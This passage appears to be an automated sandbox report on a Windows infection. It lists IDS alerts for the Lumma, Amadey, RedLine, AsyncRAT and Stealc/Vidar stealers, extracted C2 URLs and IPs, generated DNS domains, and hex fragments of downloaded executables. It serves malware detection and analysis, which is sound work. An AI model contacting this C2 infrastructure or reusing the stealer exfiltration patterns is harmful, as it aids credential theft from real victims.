Source: Network traffic	Suricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.2.4:49275 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.2.4:51873 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.4:64136 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.2.4:52617 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.2.4:62867 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.2.4:63270 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.2.4:52349 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:55529 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.4:62755 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:55538 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059427 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (suggestyuoz .biz) : 192.168.2.4:57285 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059425 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lightdeerysua .biz) : 192.168.2.4:65132 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059771 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.4:62755 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059429 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hoursuhouy .biz) : 192.168.2.4:59799 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.2.4:64417 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059435 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (affordtempyo .biz) : 192.168.2.4:56007 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059431 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mixedrecipew .biz) : 192.168.2.4:59395 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059429 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hoursuhouy .biz) : 192.168.2.4:63716 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059433 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pleasedcfrown .biz) : 192.168.2.4:50259 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:63721 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63730 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63734 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:63731 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63738 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:63737 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63742 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63743 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63746 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:63747 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63752 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com) : 192.168.2.4:60149 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:63755 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63728 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63763 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 159.100.19.137:7707 -> 192.168.2.4:63760
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 159.100.19.137:7707 -> 192.168.2.4:63760
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63761 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:63762 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:63758 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:63758 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63766 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (paleboreei .biz) : 192.168.2.4:52306 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:63769 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63776 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:63780 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:63778 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63781 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63786 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 103.84.89.222:33791 -> 192.168.2.4:63758
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:63758 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:63787 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:63788 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63790 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:63796 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 159.100.19.137:7707 -> 192.168.2.4:63789
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:63803 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:63802 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:63798 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 103.84.89.222:33791 -> 192.168.2.4:63758
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:63758 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:55428 -> 104.21.38.167:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:55428 -> 104.21.38.167:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:55450 -> 104.21.38.167:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:55435 -> 104.21.38.167:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:55435 -> 104.21.38.167:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:55534 -> 104.21.38.167:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:63728 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63728 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:63730 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63730 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:63732 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:63734 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:63717 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63744 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:63718 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63718 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:63757 -> 5.75.215.154:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63752 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:63763 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63763 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:63769 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63769 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.215.154:443 -> 192.168.2.4:63754
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:63761 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63761 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.215.154:443 -> 192.168.2.4:63757
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63803 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:55531 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:63805 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:63801 -> 5.75.215.154:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:63778 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63778 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:63765 -> 5.75.215.154:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:63768 -> 5.75.215.154:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:63719 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:63806 -> 5.75.215.154:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:63806 -> 5.75.215.154:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63719 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:63794 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63794 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:63797 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63797 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:63751 -> 5.75.215.154:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.115/c4becf79229cb002.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: impolitewearr.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: kickykiduz.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: breakfasutwy.cyou replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: finickypwk.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: miniatureyu.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: suggestyuoz.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: edcatiofireeu.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: leggelatez.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: shoefeatthe.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: toppyneedus.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pKGhIPUplSdqEpyFxAgXdkn.pKGhIPUplSdqEpyFxAgXdkn replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pleasedcfrown.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bloodyswif.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hoursuhouy.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 18.31.95.13.in-addr.arpa replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mixedrecipew.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: washyceehsu.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: affordtempyo.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: savorraiykj.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lightdeerysua.biz replaycode: Name error (3)

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 63758 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 63758
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 63758

Source: global traffic

TCP traffic: 192.168.2.4:63758 -> 103.84.89.222:33791

Source: global traffic

TCP traffic: 192.168.2.4:55221 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:21:27 GMTContent-Type: application/octet-streamContent-Length: 1802752Last-Modified: Sat, 08 Feb 2025 19:01:41 GMTConnection: keep-aliveETag: "67a7aa15-1b8200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 df 68 a3 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 e0 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 69 00 00 04 00 00 0d 52 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 78 7a 62 77 74 77 62 00 e0 19 00 00 f0 4e 00 00 da 19 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6f 6b 71 6e 6f 66 6f 00 10 00 00 00 d0 68 00 00 06 00 00 00 5a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 68 00 00 22 00 00 00 60 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:21:30 GMTContent-Type: application/octet-streamContent-Length: 2143232Last-Modified: Sat, 08 Feb 2025 19:01:51 GMTConnection: keep-aliveETag: "67a7aa1f-20b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4b 00 00 04 00 00 9e f9 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 20 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 20 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 73 6b 75 7a 66 76 68 00 00 1a 00 00 30 31 00 00 f6 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 73 75 74 64 78 77 72 00 10 00 00 00 30 4b 00 00 04 00 00 00 8e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 